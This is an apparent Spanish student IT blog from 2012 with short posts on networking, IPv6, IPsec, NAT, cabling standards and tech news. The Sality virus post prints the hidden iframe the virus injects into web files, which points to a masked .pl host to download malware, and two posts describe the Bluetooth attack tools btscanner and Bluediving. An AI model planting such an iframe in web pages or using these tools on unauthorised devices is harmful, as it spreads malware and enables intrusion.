lunes, 10 de diciembre de 2012

ME GUSTA LA COMPUTADORA Y SOY INFORMATICO


Pero eso no significa que:


CISCO RENOVARA LA RED DE TELEFONICA



Telefónica Global Solution ha seleccionado la tecnología de Cisco para optimizar su Red IP de Próxima Generación, que le permitirá proporcionar nuevos servicios a escala internacional. 

El proyecto de Internet de nueva generación de Telefónica Global Solution se basa en el despliegue de los routers de las familias Cisco CRS-3 y ASR 9000, diseñados para ofrecer una mayor capacidad, una gran resistencia y un sólido soporte del protocolo IPv6.

Con esta Red IP de Próxima Generación, Telefónica podrá ofrecer nuevos servicios y generar fuentes de ingresos novedosos ahora y en el futuro, además de disponer de la capacidad necesaria para responder a las necesidades de sus clientes a escala global, incluyendo los situados en Europa, América y Asia.

DEFINICION DE TIC



Las Tecnologías de la Información y la Comunicación, también conocidas como TIC, son el conjunto de tecnologías desarrolladas para gestionar información y enviarla de un lugar a otro. Abarcan un abanico de soluciones muy amplio. 

Incluyen las tecnologías para almacenar información y recuperarla después, enviar y recibir información de un sitio a otro, o procesar información para poder calcular resultados y elaborar informes.

Si elaborásemos una lista con los usos que hacemos de las Tecnologías de la Información y la Comunicación sería prácticamente interminable:


  • Internet de banda ancha

  • Teléfonos móviles de última generación

  • Televisión de alta definición 

CISCO CONNECT CLOUD



Cisco anuncia la disponibilidad de Cisco Connect Cloud, una plataforma de software para los routers Linksys Smart Wi-Fi que redefine y simplifica el proceso de conexión, control e interacción de los consumidores con los diferentes dispositivos con conectividad del hogar, tanto dispositivos de entretenimiento personales como electrodomésticos. Cisco Connect Cloud está diseñado para facilitar los procesos técnicos para que cada persona pueda hacer una instalación más rápida y sencilla, y disfrutar así de su conexión a Internet y de los nuevos usos que permitirá este nuevo concepto de red doméstica.

EQUIPOS ACTIVOS DE INTERCONEXION

 Tendencias tecnológicas y del mercado

Las principales tendencias del mercado de sistemas de interconexión de redes son las siguientes:

  • Tendencias de encaminamiento

El mercado está en expansión, cada vez hay más ofertas de productos y además estos incorporan nuevas facilidades de encaminamiento. Tanto los fabricantes de concentradores como los de multiplexores están incorporando en sus productos capacidades de encaminamiento, unos con redes de área metropolitana y extensa, y otros incorporando facilidades de interconexión de RALs.

  • Equipos de interconexión a bajo coste 

TIPS DE SEGURIDAD



Tips de Seguridad para los equipos de su oficina o el hogar


  • Realice Copias de seguridad de la información que es vital para su empresa u hogar constantemente.
  •  Utilice aplicaciones originales y manténgalas actualizadas, en especial su antivirus.
  •  No mantenga su computador conectado a Internet si no es estrictamente necesario.
  •  No abra correos electrónicos de contactos que no conoce y en especial los archivos que se encuentran adjuntos en el correo.

LA NUEVA GENERACION DE CABLEADO YA TIENE NOMBRE: CATEGORIA 8



La nueva generación de cableado ya está cerca.  Tal como lo he venido anunciando, las entidades de estandarización (TIA e ISO) siguen avanzando con pasos firmes en la creación de una norma para la nueva generación de Cableado Estructurado.
Ya hay decisiones tomadas y publicadas:

En la TIA:
Nombre de la nueva categoría: CATEGORIA 8
Interface: RJ-45
Ancho de banda: 2,000 Mhz (2Ghz)
Tipo de cable: F/UTP

domingo, 2 de diciembre de 2012

Topologia de red (Proyecto)




Caracteristicas de la red jerarquica

Caracteristicas del switch de capa de nucleo




 
    ·         Soporte de capa 3
    ·         Velocidad de reenvió muy alta
    ·         Gigabit Ethernet/10Gigabit Ethernet
    ·         Componentes redundantes
    ·         Agregado de enlaces
    ·         Calidad del servicio (QoS)


      martes, 27 de noviembre de 2012

      El nuevo iMac ultrafino de 21,5 pulgadas de Apple

      Parecía que Apple no iba a poder cumplir los plazos para poner a la venta su nuevo iMac de 21,5 pulgadas en noviembre, como anunciaron el día de la presentación y decía la web. No obstante, Apple llegará a tiempo: el nuevo iMac de 21,5 pulgadas saldrá a la venta el próximo viernes 30 de noviembre. En cuanto al modelo de 27 pulgadas, diciembre sigue siendo la fecha oficial.

      lunes, 13 de agosto de 2012

      Virus Sality


      Efectos 

      Sality.AO realiza las siguientes acciones:
      • Infecta los siguientes archivos:
        - archivos con extensión EXE y SCR.
        - archivos con extensión ASP, HTM y PHP mediante el siguiente 
        script :
        <iframe scr=”http://xxxxxxx.pl/rc”width=1 height=2 style=”border:0”></iframe>
        Añade este script en los archivos que encuentre en el ordenador afectado.
        Este script le permite al virus más descargar malware de diferente tipo en el ordenador afectado.

      lunes, 30 de julio de 2012

      Que es IPV6 y sus Componentes.


      El Internet Protocol version 6 (IPv6) Es una versión del protocolo Internet Protocol (IP), diseñada para reemplazar a Internet Protocol version 4 (IPv4), que actualmente está implementado en la gran mayoría de dispositivos que acceden a Internet.

      Diseñado por Steve Deering de Xerox PARC y Craig Mudge, IPv6 está destinado a sustituir a IPv4, cuyo límite en el número de direcciones de red admisibles está empezando a restringir el crecimiento de Internet y su uso, especialmente en China, India, y otros países asiáticos densamente poblados. El nuevo estándar mejorará el servicio globalmente; por ejemplo, proporcionará a futuras celdas telefónicas y dispositivos móviles sus direcciones propias y permanentes.

      Que es Broadcast ?


       Se basa en un único proceso de envío, independientemente del número de potenciales máquinas receptoras, de una misma información en una o más unidades de datos (datagramas IP) desde un origen a todas las máquinas de una red de área local. Todo ello, sin necesidad de transmitir desde el origen una copia de la misma información, por separado, a cada una de dichas máquinas.

       

      Que es Multicast ?




      Se basa en un único proceso de envío, independientemente del número de potenciales máquinas receptoras, de una misma información en una o más unidades de datos (datagramas IP) desde una máquina origen a todas las máquinas destinatarias que posean al menos un miembro de un determinado grupo de multidifusión y que, además, compartan una misma dirección de multidifusión; y, posiblemente, dispersas geográficamente en múltiples redes por Internet.


      Que es Unicast ?

       

      Se basa en un proceso de envío de una información en una o más unidades de datos (datagramas IP) desde una máquina origen a una única máquina destinataria o receptor final.

       

      Por tanto, es una transmisión punto a punto con cada destinatario. Si se desea enviar la misma información y hay “n” destinatarios, habrá “n” comunicaciones punto a punto independiente o “n” copias de la misma información enviadas desde la máquina origen. 

       

      En términos cotidianos, una comunicación unicast podría ser por ejemplo una llamada telefónica entre dos personas.

      Que es IPsec ?


      Los protocolos de IPsec actúan en la capa de red, (capa 3 del modelo OSI). Otros protocolos de seguridad para Internet de uso extendido, como SSL, TLS y SSH operan de la capa de transporte (capa 4 del modelo OSI) hacia arriba. Esto hace que IPsec sea más flexible, ya que puede ser utilizado para proteger protocolos de la capa 4, incluyendo TCP y UDP, los protocolos de capa de transporte más usados. 

      Una ventaja importante de IPsec frente a SSL y otros métodos que operan en capas superiores, es que para que una aplicación pueda usar IPsec no hay que hacer ningún cambio, mientras que para usar SSL y otros protocolos de niveles superiores, las aplicaciones tienen que modificar su código.

      Que es NAT ?


      NAT (Network Address Translation - Traducción de Dirección de Red) es un mecanismo utilizado por en caminadores IP para intercambiar paquetes entre dos redes que asignan mutuamente direcciones incompatibles. Consiste en convertir, en tiempo real, las direcciones utilizadas en los paquetes transportados. También es necesario editar los paquetes para permitir la operación de protocolos que incluyen información de direcciones dentro de la conversación del protocolo.

      IPV4Adress Report



      El sistema de Registros Regionales de Internet evolucionado con el tiempo, con el tiempo la división del mundo en cinco RIR:


      • African Network Information Centre (AfriNIC) de Africa.

      • American Registry for Internet Numbers (ARIN) de estados unidos, Canada, varias partes de la región del Caribe, y en la Antártida.

      • Asia-Pacific Network Information Centre (APNIC) de Asia, Australia, New Zealand y paises vecinos.

      • Latin America and Caribbean Network Information Centre (LACNIC) de Latino America y parte de la region caribe.

      • Réseaux IP Européens Network Coordination Centre (RIPE NCC) de Europa, Russia, Oriente Medio y Asia Central.

      BTScanner Backtrack

      BTScanner es una herramienta diseñada específicamente para extraer la información tanto como sea posible desde un dispositivo Bluetooth sin el requisito de par. Una pantalla de información detallada extrae la información de HCI y SDP, y mantiene una conexión abierta para controlar la RSSI y la calidad del enlace. btscanner se basa en la pila de Bluetooth BlueZ, que se incluye con los últimos kernels de Linux y el conjunto de herramientas BlueZ. btscanner también contiene una lista completa de los números IEEE OUI y mesas de la clase de búsqueda. Con la información obtenida de estas fuentes es posible hacer conjeturas en cuanto al tipo de dispositivo de acogida btscanner es una utilidad que sirve para reunir tanta información como sea posible desde un dispositivo Bluetooth no apareado. Está especialmente dirigido a la extracción de información de los dispositivos no emparejados, como los números de IEEE OUI, y la identificación de acogida posible. El siguiente ejemplo muestra cómo utilizar btscanner para buscar los dispositivos Bluetooth disponibles. Ejemplo de uso: btscanner Enter 'i' para iniciar un escaneo de dispositivos, y luego 'a' para abortar el análisis una vez los dispositivos se encuentran. Seleccione el dispositivo descubierto por la tecla "Enter" para ver más información sobre el objetivo.

      Bluediving Backtrack

      Bluediving es el nombre de una suite bastante interesante, pensada para conducir test de penetración en comunicaciones Bluetooh. Esta suite implementa ataques conocidos, como Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, así como otras funcionalidades como una interesante shell RFCOMM, o la posibilidad de ejecutar spoofing de direcciones Bluetooth. Programado en Perl y C, y con posibilidad de ejecución en entornos GNU Linux 2.4 / 2.6, sólo necesita depender de los paquetes BlueZ, Sox, obexftp, Gnu Readline library y XML::Simple.

      lunes, 16 de julio de 2012

      Malware

      MALWARE: de la abreviatura malicious software, este programa es muy peligroso para los computadores, esta creado para insertar gusanos, spyware, virus, troyanos, con el fin de conseguir algún objetivo como por ejemplo: obtener información sobre el usuario o del computador, se propaga en todo el disco duro y realiza sus daños si que el usuario se dé cuenta, a medida que el malware se propaga en el computador se va generando unos efectos que afectan el funcionamiento de equipo hasta deteriorarlo por completo.

      martes, 15 de mayo de 2012

      Facebook llega a cotizar en bolsa de valores este viernes

      Esta semana están en Facebook frotándose las manos con su entrada a la bolsa de valores y más Mark, quien esta semana cumple 28 años de edad, esta entrada a los mercados sería el regalo de cumpleaños perfecto para cualquier empresario de internet que esté a su nivel. Un recuento de los últimos meses luego de su anuncio oficial en febrero pasado, deja divididos diversos grupos de interés en Wall Street sobre el verdadero valor de esta red social. Unos dicen que vale más de lo que estiman los analistas, otros se acercan a una nueva burbuja punto com. Con esto, la entrada de la red social a los mercados está generando efervescencia, una bastante inusitada desde finales de la semana pasada. Facebook se ha estado preparando en estos meses: comprando a Instagram y sacando la chequera por la friolera suma de 1,000 millones deja claro su dominio en el entorno de compartir imágenes, un elemento de éxito de la red. También su plataforma de publicidad es uno de los puntos a analizar y de cómo un gigante como esta red social concentra importantes cifras de tráfico a nivel global. Se prevee que más de 337 millones de acciones serían ofrecidas a precios que oscilarían entre 28 y 35 dólares. La operación le daría un valor nuevo a Facebook como empresa: se estima que entre 70.000 y 87.500 millones de dólares y en hasta cerca de 97.000 millones será el nuevo valor incluyendo todas las opciones sobre acciones que podrían ser ejercidas de aquí a uno o dos años.

      domingo, 4 de marzo de 2012

      Definicion de S.O

      En Breve

      Un Sistema Operativo (SO) es el software básico de una computadora que provee una interfaz entre el resto de programas del ordenador, los dispositivos hardware y el usuario.

      Las funciones básicas del Sistema Operativo son administrar los recursos de la máquina, coordinar el hardware y organizar archivos y directorios en dispositivos de almacenamiento.

      Los Sistemas Operativos más utilizados son Dos, Windows, Linux y Mac. Algunos S.O ya vienen con un navegador integrado, como Windows que trae el navegador Internet Explorer.